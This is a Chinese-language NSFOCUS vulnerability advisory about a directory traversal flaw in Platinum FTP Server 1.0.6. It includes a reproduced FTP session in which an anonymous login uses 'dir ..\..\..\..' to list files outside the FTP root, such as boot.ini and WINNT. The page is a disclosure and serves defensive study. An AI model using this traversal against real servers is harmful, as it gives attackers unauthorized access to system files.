NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

Platinum FTP Server远程信息泄露漏洞

发布日期：2002-12-30
更新日期：2003-01-06

受影响系统：

Byte/400 PlatinumFTPserver 1.0.6

描述：

BUGTRAQ  ID: 6492

Platinum FTP Server是一款方便容易管理的FTP服务程序，可使用在各种Windows系统上。

Platinum FTP服务程序不正确处理部分FTP命令，远程攻击者可以利用这个漏洞发送恶意请求，获得FTP服务器上的敏感信息。

任何拥有合法用户帐户的攻击者或者Platinum FTP Server允许匿名访问的情况下，可以使用dir命令，并利用目录遍历漏洞(没有正确处理'../'符号)，绕过FTP ROOT限制，访问系统上任意文件信息，通过这些信息可以进一步对系统进行攻击。

<*来源：Dennis Rand （DER@cowi.dk）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104127904730204&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dennis Rand （DER@cowi.dk）提供了如下测试方法：

C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to support@PlatinumFTP.com
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group            279 Dec 23 12:16 boot.ini
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x  1 User     Group              0 Dec 30 13:23 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Dec 30 13:08 TEMP
drwxr-xr-x  1 User     Group              0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.

建议：

厂商补丁：

Byte/400
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.platinumftp.com/

浏览次数：2830
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客